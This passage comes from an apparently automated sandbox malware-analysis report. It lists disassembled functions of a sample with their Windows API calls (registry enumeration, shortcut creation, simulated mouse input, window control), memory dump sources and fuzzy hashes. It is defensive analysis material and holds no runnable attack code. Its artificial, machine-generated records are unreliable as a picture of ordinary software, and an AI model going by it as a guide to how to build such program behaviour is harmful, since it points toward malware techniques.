                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C72A
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C785
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C7CA
                                                                                                                                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F8C7F9
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8C853
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C85F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                        • Opcode ID: aa194ddb44962ee46b82151175f238aaf86ac4f7a22ed6b289837442c6fb34b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 5989eabd0ca80dfafdb2c756c093f15866ce5782b8290b0f8417e2c18f20e4e6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa194ddb44962ee46b82151175f238aaf86ac4f7a22ed6b289837442c6fb34b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8281A171608341AFD714EF24C885E6ABBE5FF84318F14855CF4994B2A2CB31ED45EBA2
                                                                                                                                                                                                                                                                                        Function 00F6009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 00F600A9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F60150
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(00F60354,00000000), ref: 00F60179
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(00F60354), ref: 00F6019D
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(00F60354,00000000), ref: 00F601A1
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F601AB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cccef16bca07fb296d65e4dbeb0b8369b01b2fb91b7baab0d482a2ab21706235
                                                                                                                                                                                                                                                                                        • Instruction ID: 1184e169192871f2706b4fb16c1e60825490f5ec8523639b94ca9d834d12341d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cccef16bca07fb296d65e4dbeb0b8369b01b2fb91b7baab0d482a2ab21706235
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E51D376A00310EACF20AB659C99B2AB3A5EF45310B348447E906DF297DE749C44FB96
                                                                                                                                                                                                                                                                                        Function 00F79B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00F79F2A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F79F4B
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F79F72
                                                                                                                                                                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00F79FCA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                        • Opcode ID: 681fb42363c719bb61f62dc2d691b6e23fabac43a79cfaf5acfc31a78d8b3a05
                                                                                                                                                                                                                                                                                        • Instruction ID: c4b8777821a5cdd3d28ace9836050e9f3b8a38d572de56d5cf9de96f3bd7e096
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 681fb42363c719bb61f62dc2d691b6e23fabac43a79cfaf5acfc31a78d8b3a05
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99E1A471908341DFD724EF24C881A6AB7E0BF85314F04896DF8899B2A2DB75DD05EB92
                                                                                                                                                                                                                                                                                        Function 00F76ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F76F21
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F7707E
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CC4,00000000,00000001,00FA0B34,?), ref: 00F77095
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F77319
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                        • Opcode ID: 175f3fbf098133f32d89690d6a888fb2a7fe10569d583db515bfcd2fab8ed67b
                                                                                                                                                                                                                                                                                        • Instruction ID: d3ddfeeb15ba4adb8847f3d34aa190d29c4f53d66a43f37eff0e12c9469e7bb1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 175f3fbf098133f32d89690d6a888fb2a7fe10569d583db515bfcd2fab8ed67b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D15971618301AFC300EF24C881E6BB7E8FF94744F50895DF5898B2A2DB75E905EB92
                                                                                                                                                                                                                                                                                        Function 00F01B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00F01B35
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F01B99
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F01BB6
                                                                                                                                                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F01BC7
                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00F01C15
                                                                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F43287
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01C2D: BeginPath.GDI32(00000000), ref: 00F01C4B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 88015083d93ac93085f8b78818d1113bcb71837aa5c1e723e196bbf29b428b61
                                                                                                                                                                                                                                                                                        • Instruction ID: 70d7e647303a745002c786070e327bdbc418380e6561848463ce939b260cc288
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88015083d93ac93085f8b78818d1113bcb71837aa5c1e723e196bbf29b428b61
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F641EC71605304AFD720DF24CC84FBA7BA9FB55330F10066AFAA48A2E1C7709945FB62
                                                                                                                                                                                                                                                                                        Function 00F71196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F711B3
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F711EE
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00F7120A
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00F71283
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F7129A
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F712C8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bb74bf429902e4ea863269d31c05f775535f8dfc0847d960473410cbf3b92ea0
                                                                                                                                                                                                                                                                                        • Instruction ID: eb1bd35c795008f80bcafa6e289b0c2e0428aa05434041883254c8820a72f3b5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb74bf429902e4ea863269d31c05f775535f8dfc0847d960473410cbf3b92ea0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7417E71900204EFDF049F54DC85A6A77B8FF04314F1480A6ED049B297DB34DE65EBA1
                                                                                                                                                                                                                                                                                        Function 00F98C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F5FBEF,00000000,?,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F98CA7
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00F98CCD
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F98D2C
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00F98D40
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00F98D66
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F98D8A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5e705c4a0dc2843c620006f0f501559c942c3b6f59ee68393a2c3d790335d04e
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c2495085e02a7c6733f11b57ea3a30c8fdd35fcfe65b5e9404be8e85ef4c9b0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e705c4a0dc2843c620006f0f501559c942c3b6f59ee68393a2c3d790335d04e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6641D830E02248AFEF25CF24C895BA17BF1FB56354F14006AE5094B2B2CB31584BEB51
                                                                                                                                                                                                                                                                                        Function 00F82D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00F82D45
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7EF33: GetWindowRect.USER32(?,?), ref: 00F7EF4B
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F82D6F
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F82D76
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F82DB2
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F82DDE
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F82E3C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 21cafee4393d1da56aed5033b9dd8c717a7c270c57aff04cf5fe0d49eb797d4e
                                                                                                                                                                                                                                                                                        • Instruction ID: 939a0069f6fa28022be40796c23c870c37ce61b15cbfb9a48fea30405193fb7f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cafee4393d1da56aed5033b9dd8c717a7c270c57aff04cf5fe0d49eb797d4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31B072505315ABC720EF18DC45B9BBBA9FF84354F10091AF59997181DB30E909DB92
                                                                                                                                                                                                                                                                                        Function 00F655E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00F655F9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F65616
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F6564E
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6566C
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F65674
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6567E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                        • Opcode ID: aba5ac4c16f56fb9eed5a004962c1923bda09df2a0e76927a831a2f220f1e31e
                                                                                                                                                                                                                                                                                        • Instruction ID: 64eefad993263133ec298b3e64870244ecae084b65da79d01f4088a984b2ad7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aba5ac4c16f56fb9eed5a004962c1923bda09df2a0e76927a831a2f220f1e31e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 572138326046147BEB155B78EC49F7B7BA8DF85B60F14402AF805DA092EFB6DC41F660
                                                                                                                                                                                                                                                                                        Function 00F76263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F762C0
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F763DA
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CC4,00000000,00000001,00FA0B34,?), ref: 00F763F3
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F76411
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                        • Opcode ID: 28fba33c1c7d955a3775c01491036b7191ef3a2cf9fd393a04fd1d0814c94c98
                                                                                                                                                                                                                                                                                        • Instruction ID: 0cd7e21356060c3599fa6396654799fb78539486ce26df0afba6f3ffd16a0039
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28fba33c1c7d955a3775c01491036b7191ef3a2cf9fd393a04fd1d0814c94c98
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1D13571A047019FC714DF24C884A2ABBE5EF89714F14885EF889DB3A1CB35EC45EB92
                                                                                                                                                                                                                                                                                        Function 00F986FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F98740
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F98765
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F9877D
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F987A6
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F7C1F2,00000000), ref: 00F987C6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F987B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
